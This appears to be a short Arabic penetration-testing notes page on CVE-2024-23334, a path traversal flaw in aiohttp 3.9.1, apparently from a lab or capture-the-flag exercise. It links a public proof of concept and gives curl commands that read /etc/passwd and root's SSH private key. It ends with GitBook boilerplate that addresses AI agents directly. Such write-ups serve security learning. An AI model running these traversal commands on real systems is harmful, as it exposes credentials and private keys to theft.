> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-local-file-inclusion-lfi/lfi-http-python3.9-pentesting-web.md).

# LFI HTTP Python 3.9

### ثغرة LFI في HTTP Python 3.9 /\[CVE-2024-23334]

إذا استخدمنا `curl` لعرض محتوى خدمة الويب الداخلية على المنفذ 8080، نلاحظ أن نسخة معرضة للثغرة من Python 3.9 قيد التشغيل، وتحديدًا `aiohttp/3.9.1`.

<figure><img src="/files/e5443fe7b2b14cfa4d108371dc58738128f7c26d" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/z3rObyte/CVE-2024-23334-PoC>" %}

**اعرض محتوى `/etc/passwd`** يمكننا عرض محتوى الملف `/etc/passwd` باستخدام الأمر أدناه:

```bash
curl -s --path-as-is http://localhost:8080/assets/../../../../etc/passwd

```

<figure><img src="/files/4c357a15b472ea16c3b2ad892ccf3bcea758a874" alt=""><figcaption></figcaption></figure>

**الوصول إلى المفتاح الخاص لـ SSH الخاص بالمستخدم root** نظرًا لأنه يمكننا استعراض ملفات النظام، سنحاول الآن جميعًا استرجاع المفتاح الخاص لـ SSH الخاص بالمستخدم root:

```bash
curl -s --path-as-is http://localhost:8080/assets/../../../../root/.ssh/id_rsa

```

<figure><img src="/files/0a1b442e71a3718eb0a35b45bccad06393b90ff8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-local-file-inclusion-lfi/lfi-http-python3.9-pentesting-web.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
